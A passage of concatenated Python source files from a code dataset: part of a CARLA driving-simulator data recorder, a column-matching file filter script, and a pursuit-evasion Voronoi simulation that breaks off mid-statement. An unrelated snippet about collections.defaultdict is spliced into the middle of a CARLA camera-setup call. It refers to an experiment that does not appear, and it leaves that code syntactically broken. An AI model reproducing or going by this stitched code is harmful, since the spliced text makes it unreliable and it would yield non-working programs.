= calibration[1, 1] = sensor_width / (2.0 * np.tan(fov * np.pi / 360.0))\n self.rgb_camera.calibration = calibration # Parameter K of the camera\n self.sensors_list.append(self.rgb_camera)\n return self.rgb_camera\n\n def put_depth_sensor(self, vehicle, sensor_width=640, sensor_height=480, fov=110):\n # https://carla.readthedocs.io/en/latest/cameras_and_sensors/\n bp = self.blueprint_library.find('sensor.camera.depth')\n bp.set_attribute('image_size_x', f'{sensor_width}')\n bp.set_attribute('image_size_y', f'{sensor_height}')\n bp.set_attribute('fov', 
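The long `if key in results ... else ...` ladder in the experiment above disappears with collections.defaultdict, which creates the list on first access (metric name and fold scores below are illustrative):

from collections import defaultdict
import numpy as np

results = defaultdict(list)
for name, fold_scores in [("PCA_test_overall", [0.91, 0.88]),
                          ("PCA_test_overall", [0.90, 0.92])]:
    results[name].append(np.mean(fold_scores))  # no existence check needed
print(dict(results))  # {'PCA_test_overall': [0.895, 0.91]}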
f'{fov}')\n\n # Adjust sensor relative position to the vehicle\n spawn_point = carla.Transform(carla.Location(x=self.camera_x_location, z=self.camera_z_location))\n self.depth_camera = self.world.spawn_actor(bp, spawn_point, attach_to=vehicle)\n self.sensors_list.append(self.depth_camera)\n return self.depth_camera\n\n def process_depth_data(self, data, sensor_width, sensor_height):\n \"\"\"\n normalized = (R + G * 256 + B * 256 * 256) / (256 * 256 * 256 - 1)\n in_meters = 1000 * normalized\n \"\"\"\n data = np.array(data.raw_data)\n data = data.reshape((sensor_height, sensor_width, 4))\n data = data.astype(np.float32)\n # Apply (R + G * 256 + B * 256 * 256) / (256 * 256 * 256 - 1).\n normalized_depth = np.dot(data[:, :, :3], [65536.0, 256.0, 1.0])\n normalized_depth /= 16777215.0 # (256.0 * 256.0 * 256.0 - 1.0)\n depth_meters = normalized_depth * 1000\n return depth_meters\n\n def get_bb_data(self):\n vehicles_on_world = self.world.get_actors().filter('vehicle.*')\n walkers_on_world = self.world.get_actors().filter('walker.*')\n bounding_boxes_vehicles = ClientSideBoundingBoxes.get_bounding_boxes(vehicles_on_world, self.rgb_camera)\n bounding_boxes_walkers = ClientSideBoundingBoxes.get_bounding_boxes(walkers_on_world, self.rgb_camera)\n return [bounding_boxes_vehicles, bounding_boxes_walkers]\n\n def process_rgb_img(self, img, sensor_width, sensor_height):\n img = np.array(img.raw_data)\n img = img.reshape((sensor_height, sensor_width, 4))\n img = img[:, :, :3] # taking out opacity channel\n bb = self.get_bb_data()\n return img, bb\n\n def remove_sensors(self):\n for sensor in self.sensors_list:\n sensor.destroy()\n self.sensors_list = []\n\n def begin_data_acquisition(self, sensor_width, sensor_height, fov, frames_to_record_one_ego=1, timestamps=[], egos_to_run=10):\n # Changes the ego vehicle to be put the sensor\n current_ego_recorded_frames = 0\n # These vehicles are not considered because the cameras get occluded without changing their absolute position\n ego_vehicle = random.choice([x for x in self.world.get_actors().filter(\"vehicle.*\") if x.type_id not in\n ['vehicle.audi.tt', 'vehicle.carlamotors.carlacola', 'vehicle.volkswagen.t2']])\n self.put_rgb_sensor(ego_vehicle, sensor_width, sensor_height, fov)\n self.put_depth_sensor(ego_vehicle, sensor_width, sensor_height, fov)\n\n # Begin applying the sync mode\n with CarlaSyncMode(self.world, self.rgb_camera, self.depth_camera, fps=30) as sync_mode:\n # Skip initial frames where the car is being put on the ambient\n if self.first_time_simulating:\n for _ in range(30):\n sync_mode.tick_no_data()\n\n while True:\n if current_ego_recorded_frames == frames_to_record_one_ego:\n print('\\n')\n self.remove_sensors()\n return timestamps\n # Advance the simulation and wait for the data\n # Skip every nth frame for data recording, so that one frame is not that similar to another\n wait_frame_ticks = 0\n while wait_frame_ticks < 5:\n sync_mode.tick_no_data()\n wait_frame_ticks += 1\n\n _, rgb_data, depth_data = sync_mode.tick(timeout=2.0) # If needed, self.frame can be obtained too\n # Processing raw data\n rgb_array, bounding_box = self.process_rgb_img(rgb_data, sensor_width, sensor_height)\n depth_array = self.process_depth_data(depth_data, sensor_width, sensor_height)\n ego_speed = ego_vehicle.get_velocity()\n ego_speed = np.array([ego_speed.x, ego_speed.y, ego_speed.z])\n bounding_box = apply_filters_to_3d_bb(bounding_box, depth_array, sensor_width, sensor_height)\n timestamp = round(time.time() * 1000.0)\n\n # Saving into opened HDF5 
dataset file\n self.HDF5_file.record_data(rgb_array, depth_array, bounding_box, ego_speed, timestamp)\n current_ego_recorded_frames += 1\n self.total_recorded_frames += 1\n timestamps.append(timestamp)\n\n sys.stdout.write(\"\\r\")\n sys.stdout.write('Frame {0}/{1}'.format(\n self.total_recorded_frames, frames_to_record_one_ego*egos_to_run*len(self.weather_options)))\n sys.stdout.flush()\n","repo_name":"AlanNaoto/carla-dataset-runner","sub_path":"CarlaWorld.py","file_name":"CarlaWorld.py","file_ext":"py","file_size_in_byte":8185,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"67"} +{"seq_id":"28832134470","text":"#!/usr/bin/env python\n\n'''\nGiven two files, select (output) lines of the second (data) file which contain one of\nthe data items in the first (selector) file.\nYarko Tymciurak\n'''\nfrom __future__ import print_function\nfrom collections import namedtuple\nfrom optparse import OptionParser\nimport sys\n\nLINEEND = '\\r\\n' # for rstrip\nFIELDSEP = '\\t' # for split\n\nerror_log = sys.stderr\n\ndef main():\n useage = '''useage:\n %prog [-s [name|number] selector_file [-c [name|number] data_file [-o output_file]\"\n \n Given two input files, the values of a specified column of\n a selector file will be used to select output.\n Data in the specified \"compare\" column of the data_file will\n be checked against the selector data.\n If a compare data item from the data_file exists in the selector set,\n then that data_file row (line) will be output.\n \n You may also specify an output file.\n \n - If a field name is given, the first line of the file\n is assumed to contain field names.\n - If a field number is given, the n-th field is used (left-to-right,\n beginning with 1); all lines are assumed to be data\n - Fields are assumed to be TAB separated.\n \n \n example:\n % select -s IID relationships.txt -c 2 some.ped -o filtered.ped\n \n This will use the \"IID\" column from relationships. 
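The calibration matrix assembled in put_rgb_sensor above is the standard pinhole intrinsics: principal point at the image centre, and focal length in pixels derived from the horizontal field of view as f = w / (2 * tan(fov / 2)). Standalone:

import numpy as np

def camera_intrinsics(width, height, fov_deg):
    K = np.identity(3)
    K[0, 2] = width / 2.0    # principal point x
    K[1, 2] = height / 2.0   # principal point y
    # fov_deg * pi / 360 is half the FOV in radians
    K[0, 0] = K[1, 1] = width / (2.0 * np.tan(fov_deg * np.pi / 360.0))
    return K

print(camera_intrinsics(640, 480, 110))  # f is about 224 px at 110 degrees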
Any row in \"some.ped\"\n which has column-2 data matching an IID data will be output to \"filtered.ped\"\n \n This is equivalent:\n % select -sIID relationships.txt -c2 some.ped -ofiltered.ped\n \n '''\n parser = OptionParser(useage)\n\n parser.add_option( \"-s\", \"--select-column\", dest=\"select_column\",\n help=\"column from which to build selection matching data\")\n parser.add_option( \"-c\", \"--compare-column\", dest=\"compare_column\",\n help=\"column to compare against selection criteria\")\n parser.add_option( \"-o\", \"--output\", dest=\"output\",\n help=\"output file for selected data\")\n\n (options,args) = parser.parse_args()\n output = options.output\n select_column = proper_type(options.select_column)\n compare_column = proper_type(options.compare_column)\n compare_asindex = type(compare_column) is int\n\n if (select_column is None) or (compare_column is None):\n error_log.write(\"Need to specify select column (-s) and compare column (-c).\\nTry -h option for help.\\n\")\n exit(1)\n if len(args)<2:\n parser.print_help()\n exit(1)\n\n fname = args[0]\n fp = sys.stdin if fname == '-' else must_open(fname)\n fo = sys.stdout if output is None else must_open(output, 'w')\n selectors = get_selectors(fp, select_column)\n if type(select_column) is int:\n select_column -= 1 # adjust for zero-based array indexing\n\n for fname in args[1:]:\n global n\n n = 0\n fp = sys.stdin if fname == '-' else must_open(fname)\n line = fp.readline()\n # assume first line is a header line, if named data field:\n if not compare_asindex:\n dat = namedtuple(\"dat\", line.rstrip(LINEEND).split(FIELDSEP))\n line = fp.readline()\n else:\n maxsplit = compare_column\n compare_column -= 1 # i.e. 2nd column => row[1]\n while not (line == ''):\n n+=1\n # split the line fields\n if compare_asindex:\n line_element = line.rstrip(LINEEND).split(FIELDSEP, maxsplit)\n else:\n drow = dat(*line.rstrip(LINEEND).split(FIELDSEP))\n line_element = drow._asdict()\n \n # output if the specified data field is in the selector\n if line_element[compare_column] in selectors:\n fo.write(line)\n line = fp.readline()\n\n\ndef get_selectors(fp, column):\n '''\n using the global option, select a column from the file, and return a dict (hash performance) with all the values\n '''\n selectors = {}\n # Get column option:\n # - if numeric, split the fields and use number as an index,\n # - else use named.tuples, and use the first line as the header\n asindex = type(column) is int\n if not asindex:\n # get the first line, which we expect to be the column header\n line = fp.readline()\n hdr = namedtuple(\"hdr\", line.rstrip(LINEEND).split(FIELDSEP))\n else: # can only limit splits on numerics\n maxsplit = column\n column -= 1 # i.e. 
2nd column => row[1]\n # now go thru the file:\n line = fp.readline()\n while not (line==''):\n # prepare so we index correctly either way:\n if asindex:\n row = line.rstrip(LINEEND).split(FIELDSEP, maxsplit)\n else:\n drow = hdr(*line.rstrip(LINEEND).split(FIELDSEP))\n row = drow._asdict()\n selectors[row[column]]='' # we only care about key, not value\n line = fp.readline()\n return selectors\n\ndef must_open(f, c='r'):\n try:\n fp = open(f,c)\n except IOError as e:\n error_log.write('Unable to open %s : %s\\n' % (f,e))\n exit(2)\n return fp\n\ndef proper_type(i):\n return int(i) if (i and i.isdigit()) else i\n\nif __name__=='__main__':\n main()","repo_name":"hakyim/miscel","sub_path":"code/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73769109654","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial import Delaunay\nimport random\nimport queue\n\n\n##----------------------------判定键入evader和pursuers的坐标是否满足要求---------------------##\n## 判断准则:存在一个Pi到E上的任意点的距离小于e到E的距离,且任意Pi到e的距离都大于Rc\n## evader默认为键入点中索引值为0的点\n## param:\n## points 键入的点的坐标数组; E_出口E的两个端点\n## return:\n## result 键入的点的坐标是否满足要求 0-不满足 1-满足;\ndef initial_judge(points, E_, Rc):\n print(\"对初始坐标验证中......\")\n result = 0\n for i in range(1, 3):\n if np.square(points[i][0] - points[0][0]) + np.square(points[i][1] - points[0][1]) > Rc ** 2:\n if 2 * (points[i][1] - points[0][1]) * E_[0][1] + np.square(points[0][1]) - np.square(\n points[i][1]) + np.square(points[0][0]) - np.square(points[i][0]) > 0:\n if 2 * (points[i][1] - points[0][1]) * E_[1][1] + np.square(points[0][1]) - np.square(\n points[i][1]) + np.square(points[0][0]) - np.square(points[i][0]) > 0:\n # 存在一个Pi到E上的任意点的距离小于e到E的距离,置1,继续循环\n result = 1\n else:\n # 存在Pi到e的距离小于Rc,不满足条件,置0,并结束循环\n result = 0\n break\n if result:\n print(\"初始坐标满足要求\")\n else:\n print(\"初始坐标不满足要求,请重新键入\")\n return result\n\n\n##------------------------------------分配defender角色------------------------------------##\n## 获取defender的坐标,默认为距离E最近的点\n## param:\n## points 键入的点的坐标数组; E_出口E的两个端点\n## return:\n## defender_index defender在键入的点集中的索引值\ndef get_defender(points, E_):\n min_distance = 100\n min_i = 0\n for i in range(1, 3):\n if points[i][1] <= E_[1][1] and points[i][1] >= E_[0][1]:\n distance = points[i][0] ** 2\n if distance <= min_distance:\n min_distance = distance\n min_i = i\n else:\n distance = min((np.square(points[i][0]) + np.square(points[i][1] - E_[0][1])),\n (np.square(points[i][0]) + np.square(points[i][1] - E_[1][1])))\n if distance <= min_distance:\n min_distance = distance\n min_i = i\n return min_i\n\n\n##---------------------------------计算三角形的外心----------------------------------------##\n## A B C为三角形的三个顶点\n## k为斜率值 ab和bc为对应边的角度\n## (x,y)为外接圆圆心 r为半径\ndef get_outer_circle(A, B, C):\n # 顶点的坐标\n xa, ya = A[0], A[1]\n xb, yb = B[0], B[1]\n xc, yc = C[0], C[1]\n\n # 两条边的中点\n xab, yab = (xa + xb) / 2.0, (ya + yb) / 2.0\n xbc, ybc = (xb + xc) / 2.0, (yb + yc) / 2.0\n\n # 两条边的斜率\n if (xb != xa):\n kab = (yb - ya) / (xb - xa)\n else:\n kab = None\n\n if (xc != xb):\n kbc = (yc - yb) / (xc - xb)\n else:\n kbc = None\n\n if (kab != None):\n ab = np.arctan(kab)\n else:\n ab = np.pi / 2\n\n if (kbc != None):\n bc = np.arctan(kbc)\n else:\n bc = np.pi / 2\n\n # 两条边的中垂线\n if (ab == 0):\n kabm = None\n b1 = 0\n x = xab\n else:\n kabm = np.tan(ab + np.pi / 2)\n b1 = yab * 1.0 - xab * kabm * 1.0\n\n if (bc == 0):\n kbcm = None\n b2 = 0\n x = 
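When both files fit in memory, the selection the script above implements reduces to one set build plus one membership test per data row (tab-separated columns and 1-based column numbers, as in the CLI):

def select_rows(selector_lines, data_lines, s_col, c_col):
    # Keys drawn from the selector file's s_col column.
    keys = {line.rstrip("\r\n").split("\t")[s_col - 1] for line in selector_lines}
    # Keep data rows whose c_col value appears among the keys.
    return [line for line in data_lines
            if line.rstrip("\r\n").split("\t")[c_col - 1] in keys]

print(select_rows(["a\tx\n", "b\ty\n"], ["1\ta\n", "2\tc\n"], 1, 2))  # ['1\ta\n']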
xbc\n else:\n kbcm = np.tan(bc + np.pi / 2)\n b2 = ybc * 1.0 - xbc * kbcm * 1.0\n\n if (kabm != None and kbcm != None):\n x = (b2 - b1) * 1.0 / (kabm - kbcm)\n\n if (kabm != None):\n y = kabm * x * 1.0 + b1 * 1.0\n else:\n y = kbcm * x * 1.0 + b2 * 1.0\n\n r = np.sqrt((x - xa) ** 2 + (y - ya) ** 2)\n return (x, y, r)\n\n\n##---------------------------------获取直线和边界的交点------------------------------------##\n## a b c为直线解析式ax+by+c=0中的参数\n## bound为边界的限制,例如矩阵:bound[0,1,2,3]分别表示x的最小最大值以及y的最小最大值\n## (x1, y1)和(x2, y2)为交点的坐标\n## flag表示寻找到交点的数量\ndef get_intersect_point(a, b, c, bound):\n # 初始化\n flag = 0\n x1 = y1 = x2 = y2 = 0\n\n if b == 0:\n # 斜率不存在\n x1 = x2 = -c / a\n y1 = bound[2]\n y2 = bound[3]\n else:\n # 斜率存在\n if (-c - a * bound[0]) / b <= bound[3] and (-c - a * bound[0]) / b >= bound[2]:\n # 线和x=bound[0]存在符合要求的交点\n if flag == 0:\n x1 = bound[0]\n y1 = (-c - a * bound[0]) / b\n flag = 1\n else:\n x2 = bound[0]\n y2 = (-c - a * bound[0]) / b\n flag = 2\n\n if (-c - a * bound[1]) / b <= bound[3] and (-c - a * bound[1]) / b >= bound[2]:\n # 线和x=bound[1]存在符合要求的交点\n if flag == 0:\n x1 = bound[1]\n y1 = (-c - a * bound[1]) / b\n flag = 1\n else:\n # 找到过符合要求的交点\n x2 = bound[1]\n y2 = (-c - a * bound[1]) / b\n flag = 2\n\n if (-c - b * bound[2]) / a <= bound[1] and (-c - b * bound[2]) / a >= bound[0]:\n # 线和y=bound[2]存在符合要求的交点\n if flag == 0:\n y1 = bound[2]\n x1 = (-c - b * bound[2]) / a\n flag = 1\n else:\n y2 = bound[2]\n x2 = (-c - b * bound[2]) / a\n flag = 2\n\n if (-c - b * bound[3]) / a <= bound[1] and (-c - b * bound[3]) / a >= bound[0]:\n # 线和y=bound[3]存在符合要求的交点\n if flag == 0:\n y1 = bound[3]\n x1 = (-c - b * bound[3]) / a\n flag = 1\n else:\n y2 = bound[3]\n x2 = (-c - b * bound[3]) / a\n flag = 2\n if flag == 1:\n # 只存在一个交点\n x2 = x1\n y2 = y1\n\n return x1, y1, x2, y2\n\n\n##-----------------------------获取Voronoit图中需要连接的两点-------------------------------##\n## A B为需要连接的两点,因为需要考虑其中点在边界以外,这个需要截取线段在边界内部的部分,如果都在外面则舍弃\n## flag 1表示A、B两点不是都在边界以外 0表示A、B两点都在边界以外\n## C表示截取线段中位于边界上的端点\ndef intersect(A, B, bound):\n flag = 0\n C = [0, 0]\n if A[0] >= bound[0] and A[0] <= bound[1] and A[1] >= bound[2] and A[1] <= bound[3]:\n # A点在区域内部\n if B[0] >= bound[0] and B[0] <= bound[1] and B[1] >= bound[2] and B[1] <= bound[3]:\n # B点在区域内\n flag = 1\n return A[0], A[1], B[0], B[1], flag\n else:\n # B点不在区域内\n flag = 1\n if (A[0] == B[0]):\n # AB的斜率不存在\n if (B[1] > bound[3]):\n x = A[0]\n y = bound[3]\n else:\n x = A[0]\n y = bound[2]\n C[0] = x\n C[1] = y\n else:\n # AB的斜率存在\n a = A[1] - B[1]\n b = B[0] - A[0]\n c = B[1] * A[0] - A[1] * B[0]\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n if x1 >= min(A[0], B[0]) and x1 <= max(A[0], B[0]) and y1 >= min(A[1], B[1]) and y1 <= max(A[1], B[1]):\n C[0] = x1\n C[1] = y1\n else:\n C[0] = x2\n C[1] = y2\n return A[0], A[1], C[0], C[1], flag\n else:\n # A点不在区域内部\n if B[0] >= bound[0] and B[0] <= bound[1] and B[1] >= bound[2] and B[1] <= bound[3]:\n # B点在区域内\n flag = 1\n if (A[0] == B[0]):\n # AB的斜率不存在\n if (A[1] > bound[3]):\n x = B[0]\n y = bound[3]\n else:\n x = B[0]\n y = bound[2]\n C = [x, y]\n else:\n # AB的斜率存在\n a = A[1] - B[1]\n b = B[0] - A[0]\n c = B[1] * A[0] - A[1] * B[0]\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n if x1 >= min(A[0], B[0]) and x1 <= max(A[0], B[0]) and y1 >= min(A[1], B[1]) and y1 <= max(A[1], B[1]):\n C[0] = x1\n C[1] = y1\n else:\n C[0] = x2\n C[1] = y2\n return B[0], B[1], C[0], C[1], flag\n else:\n flag = 1\n if (A[0] == B[0]):\n flag = 0\n return A[0], A[1], B[0], B[1], flag\n else:\n a = A[1] - B[1]\n b = B[0] 
- A[0]\n c = B[1] * A[0] - A[1] * B[0]\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n return x1, y1, x2, y2, flag\n\n\n##----------------------------------判断两点是否位于直线异侧--------------------------------##\n## p1和p2为直线上的两点,p3和p4是需要进行判断的两点\n## a b c为直线p1p2解析式ax+by+c=0中的参数\ndef IsIntersec(p1, p2, p3, p4):\n a = p1[1] - p2[1]\n b = p2[0] - p1[0]\n c = p1[0] * p2[1] - p2[0] * p1[1]\n if (a * p3[0] + b * p3[1] + c) * (a * p4[0] + b * p4[1] + c) <= 0:\n return 1\n else:\n return 0\n\n\n##-------------------------------获取中垂线和边界符合要求的交点------------------------------##\n## A B为需要求中垂线的的线段的两个端点 C为三角形中除了A和B以外剩下的顶点 D为符合要求的交点\n## a b c为中垂线解析式中的参数\n## (x1, y1) (X2,y2)为中垂线和边界的两个交点的坐标\ndef midline(A, B, C, bound):\n a = 2 * (B[0] - A[0])\n b = 2 * (B[1] - A[1])\n c = A[0] ** 2 - B[0] ** 2 + A[1] ** 2 - B[1] ** 2\n x1, y1, x2, y2 = get_intersect_point(a, b, c, bound)\n D = [x1, y1]\n if IsIntersec(A, B, C, D):\n D = [x1, y1]\n else:\n D = [x2, y2]\n return D\n\n\n##-----------------------------------获取li的两个端点-------------------------------------##\ndef get_l_point(A, B, C, D):\n # A-交点1 B-交点2 C-evader D-pursuer\n a1 = A[1] - B[1]\n b1 = B[0] - A[0]\n c1 = B[1] * A[0] - B[0] * A[1]\n a2 = C[1] - D[1]\n b2 = D[0] - C[0]\n c2 = D[1] * C[0] - D[0] * C[1]\n d = a1 * b2 - a2 * b1\n x1 = (b1 * c2 - b2 * c1) / d\n y1 = (a2 * c1 - a1 * c2) / d\n v1 = [D[0] - A[0], D[1] - A[1]]\n v2 = [D[0] - C[0], D[1] - C[1]]\n if np.cross(v1, v2) > 0:\n x2 = A[0]\n y2 = A[1]\n else:\n x2 = B[0]\n y2 = B[1]\n return x1, y1, x2, y2\n\n\n##-----------------------------------获取evader的策略-------------------------------------##\nevader_strategy = queue.Queue()\n\n\ndef evader_controller(event):\n global evader_strategy\n if evader_strategy.qsize() < 10:\n print(\"evader策略队列未满\")\n evader_strategy.put([event.xdata, event.ydata])\n print(event.xdata, event.ydata)\n else:\n print(\"evader策略队列已满\")\n return\n\n\n## ------------------------------------Main Function------------------------------------##\n# 绘制图的坐标X和Y\nax = []\nay = []\n\n# 动态图\nplt.ion()\nfig = plt.figure()\n\n# 更新步长\nstep = 5\n\n# 设置区域边界\nbounding_box = np.array([0., 10., 0., 10.])\nE_ = [[0., 4.], [0., 6.]]\nE_ = np.array(E_)\n\n# 绘制边界\nplt.plot([bounding_box[0], E_[0][0]], [bounding_box[2], E_[0][1]], 'k-')\nplt.plot([E_[1][0], bounding_box[0]], [E_[1][1], bounding_box[3]], 'k-')\nplt.plot([bounding_box[1], bounding_box[1]], [bounding_box[2], bounding_box[3]], 'k-')\nplt.plot([bounding_box[0], bounding_box[1]], [bounding_box[2], bounding_box[2]], 'k-')\nplt.plot([bounding_box[0], bounding_box[1]], [bounding_box[3], bounding_box[3]], 'k-')\n\npoints = []\n\nRc_limt = 0.5\n\nwhile True:\n points_pos = plt.ginput(3)\n print(\"初始坐标:\")\n print(points_pos)\n if initial_judge(points_pos, E_, Rc_limt):\n j = 0\n # evader i=0\n ax.append(points_pos[0][0])\n ay.append(points_pos[0][1])\n points.append([ax[j], ay[j]])\n j = j + 1\n # defender i=1\n defender_i = get_defender(points_pos, E_)\n ax.append(points_pos[defender_i][0])\n ay.append(points_pos[defender_i][1])\n points.append([ax[j], ay[j]])\n j = j + 1\n # pursuers i=2.3\n for i in range(1, 3):\n if i != defender_i:\n ax.append(points_pos[i][0])\n ay.append(points_pos[i][1])\n points.append([ax[j], ay[j]])\n j = j + 1\n break\n\npoints = np.array(points)\n\n# 计算各个pursuer到evader的距离\nRc = []\n\nfor i in range(1, 3):\n Rc.append(np.sqrt(np.sum(np.square(points[0] - points[i]))))\n\nRc = np.array(Rc)\n\nD = [0, 0]\n\nd = [points[0][0], points[0][1]]\n\n# 获取鼠标键入\ncid = fig.canvas.mpl_connect('button_press_event', 
evader_controller)\n\nwhile Rc[0] > 0.5 and Rc[1] > 0.5 and points[0][0] - D[0] >= 0:\n print(\"-------------------------------test----------------------------\")\n # print(Rc[0], Rc[1])\n print(\"点的坐标:\")\n print(points)\n # 计算Rc\n for i in range(0, 2):\n Rc[i] = (np.sqrt(np.sum(np.square(points[0] - points[i + 1]))))\n print(Rc[i])\n\n # 默认0号point就是evader,1号point是defender\n print(\"evader:\")\n print(points[0])\n\n print(\"defender:\")\n print(points[1])\n\n # 绘制pursuers和evader的点\n plt.clf()\n plt.plot(ax[0], ay[0], 'gp')\n plt.plot(ax[1], ay[1], 'b*')\n plt.plot(ax[2:], ay[2:], 'ro')\n\n # 绘制边界\n plt.plot([bounding_box[0], E_[0][0]], [bounding_box[2], E_[0][1]], 'k-')\n plt.plot([E_[1][0], bounding_box[0]], [E_[1][1], bounding_box[3]], 'k-')\n plt.plot([bounding_box[1], bounding_box[1]], [bounding_box[2], bounding_box[3]], 'k-')\n plt.plot([bounding_box[0], bounding_box[1]], [bounding_box[2], bounding_box[2]], 'k-')\n plt.plot([bounding_box[0], bounding_box[1]], [bounding_box[3], bounding_box[3]], 'k-')\n\n s = []\n\n # 计算s1和s2\n for i in range(0, 2):\n s.append(np.sqrt(np.sum(np.square(E_[i] - points[1]))) - np.sqrt(np.sum(np.square(E_[i] - points[0]))))\n\n # Sj+的宽度定义\n wid = 0.5\n\n defender_flag = -1\n\n # 制定defender的策略\n if s[0] < 0 and s[1] < 0:\n # 位于Dp内部\n defender_flag = 1\n elif s[0] < wid and s[0] >= 0:\n # 位于S1和S1+上\n defender_flag = 0\n uj_ = (E_[0] - points[1]) / (step * np.sqrt(np.sum(np.square(E_[0] - points[1]))))\n elif s[1] < wid and s[1] >= 0:\n # 位于S2和S2+上\n defender_flag = 0\n uj_ = (E_[1] - points[1]) / (step * np.sqrt(np.sum(np.square(E_[1] - points[1]))))\n\n\n Ve_ = []\n # 三点共线的时候\n if points[0][0] * points[1][1] - points[1][0] * points[0][1] + points[1][0] * points[2][1] - points[2][0] * \\\n points[1][1] + points[2][0] * points[0][1] - points[0][0] * points[2][1] == 0:\n print(\"此时三点共线\")\n for i in range(0, 2):\n Ve_.append((points[0] - points[i + 1]) / (step * Rc[i]))\n if defender_flag == 0:\n print(\"defender在Sj U Sj+内,执行防御策略\")\n points[1] = points[1] + uj_\n points[2] = points[2] + Ve_[1]\n else:\n print(\"defender在Dp内部,执行追捕策略\")\n points[i + 1] = points[i + 1] + Ve_[i]\n else:\n # 生成Delaunay图,tri.simplices为三角形中顶点的索引,索引值为points中的索引值\n tri = Delaunay(points)\n\n # 打印三角形的顶点索引\n # print(\"Delaunay三角形的顶点索引\")\n # print(tri.simplices)\n\n # 声明外心和Delaunay三角网中三角形\n circle = []\n tri_lines = []\n\n # 获取三角形的外心和边的索引\n for num in range(0, tri.simplices.shape[0]):\n print(num)\n plt.axis('equal')\n plt.axis('off')\n x, y, r = get_outer_circle(points[tri.simplices[num][0]], points[tri.simplices[num][1]],\n points[tri.simplices[num][2]])\n circle.append([x, y])\n tri.simplices[num].sort() # 对Delaunay三角形的顶点按照索引大小排序,方便对构造边的索引\n # print(\"Delaunay三角形的顶点坐标:\")\n # print(points[tri.simplices[num][0]], points[tri.simplices[num][1]], points[tri.simplices[num][2]])\n # 用边的顶点的索引构成边的元组,dic中key���不能为list,但可以是元组\n tup = (tri.simplices[num][0], tri.simplices[num][1])\n tri_lines.append(tup)\n tup = (tri.simplices[num][0], tri.simplices[num][2])\n tri_lines.append(tup)\n tup = (tri.simplices[num][1], tri.simplices[num][2])\n tri_lines.append(tup)\n\n # print(\"Delaunay所有三角形的边的索引对:\")\n # print(tri_lines)\n\n # 构造边对应三角形索引的桶,遍历三角网中每个三角形的各边,获得边对应的三角形dic: (端点1,端点2):[三角形1,三角形2]\n # 三角形使用索引值为Delaunay()生成的三角网tri对每个三角形定义的索引值\n i = 0\n dic = dict()\n for tri_line in tri_lines:\n if tri_lines[i] in dic.keys():\n dic[tri_lines[i]].append(int(i) // int(3))\n i = i + 1\n else:\n dic[tri_lines[i]] = [int(i) // int(3)]\n i = i + 1\n\n print(\"边-三角形对应情况:\")\n print(dic)\n\n # 
构造Voronoi图,voronoi_graph对应关系为:具有相邻关系的两个智能体坐标索引-两智能体之间的Voronoi边\n voronoi_graph = dict()\n\n # 绘制Voronoi图\n # 遍历三角网中的每条边\n for key, value in dic.items():\n print(key)\n print(\"边对应的三角形:\")\n print(value)\n if len(value) == 2:\n # 该边是有公共三角形的边,则连接外心\n # print(circle[value[0]], circle[value[1]])\n x1, y1, x2, y2, flag = intersect(circle[value[0]], circle[value[1]], bounding_box)\n # key值对应的两个智能体之间的Voronoi边\n voronoi_graph[key] = [[x1, y1], [x2, y2]]\n if flag:\n # flag为1 表示AB两点没有都在区域外面\n p1 = [x1, x2]\n p2 = [y1, y2]\n # print(\"Voronoi边的端点:\")\n # print(p1, p2)\n # 绘制Voronoi边\n plt.plot(p1, p2, 'y-')\n else:\n # 没有公共边的三角形 连接外心和中垂线的交点\n print(\"没有公共边三角形\")\n # 获取三角形剩下的顶点\n for i in range(0, 3):\n if (tri.simplices[value[0]][i] != key[0] and tri.simplices[value[0]][i] != key[1]):\n peak = [points[tri.simplices[value[0]][i]][0], points[tri.simplices[value[0]][i]][1]]\n break\n # 获取Voronoi边的端点\n if circle[value[0]][0] < bounding_box[0] or circle[value[0]][0] > bounding_box[1] or circle[value[0]][\n 1] < bounding_box[2] or circle[value[0]][1] > bounding_box[3]:\n x1, y1 = circle[value[0]][0], circle[value[0]][1]\n x2, y2 = midline(points[key[0]], points[key[1]], peak, bounding_box)\n flag = 0\n else:\n x1, y1, x2, y2, flag = intersect(circle[value[0]],\n midline(points[key[0]], points[key[1]], peak, bounding_box),\n bounding_box)\n # key值对应的两个智能体之间的Voronoi边\n voronoi_graph[key] = [[x1, y1], [x2, y2]]\n if flag:\n # flag为1 表示AB两点没有都在区域外面\n p1 = [x1, x2]\n p2 = [y1, y2]\n # print(\"Voronoi边的端点:\")\n # print(p1, p2)\n # 绘制Voronoi边\n plt.plot(p1, p2, 'y-')\n\n # 声明evader相邻和不相邻的pursuer的points索引\n neighbor = []\n unneighbor = []\n\n # 获取evader相邻的pursuers的points索引值并存入neighbor中\n for tri_line in tri_lines:\n if (tri_line[0] == 0 or tri_line[1] == 0):\n if tri_line[1] + tri_line[0] not in neighbor:\n if voronoi_graph[tri_line][0][0] != voronoi_graph[tri_line][1][0] or voronoi_graph[tri_line][0][\n 1] != voronoi_graph[tri_line][1][1]:\n neighbor.append(tri_line[1] + tri_line[0])\n\n # 获取evader不相邻的pursuers的points索引值并存入unneighbor中\n for i in range(1, 3):\n if i not in neighbor:\n unneighbor.append(i)\n\n vp = []\n\n for i in range(1, 3):\n if i in neighbor:\n if i == 1:\n if defender_flag:\n mid = np.array([(voronoi_graph[(0, i)][0][0] + voronoi_graph[(0, i)][1][0]) / 2,\n (voronoi_graph[(0, i)][0][1] + voronoi_graph[(0, i)][1][1]) / 2])\n vp.append((mid - points[i]) / (step * np.sqrt(np.sum(np.square(mid - points[i])))))\n else:\n vp.append(uj_)\n else:\n mid = np.array([(voronoi_graph[(0, i)][0][0] + voronoi_graph[(0, i)][1][0]) / 2,\n (voronoi_graph[(0, i)][0][1] + voronoi_graph[(0, i)][1][1]) / 2])\n vp.append((mid - points[i]) / (step * np.sqrt(np.sum(np.square(mid - points[i])))))\n else:\n if i == 1:\n if defender_flag:\n vp.append((points[0]-points[i]) / (step * np.sqrt(np.sum(np.square(points[0] - points[i])))))\n else:\n vp.append(uj_)\n else:\n vp.append((points[0]-points[i]) / (step * np.sqrt(np.sum(np.square(points[0] - points[i])))))\n\n vp = 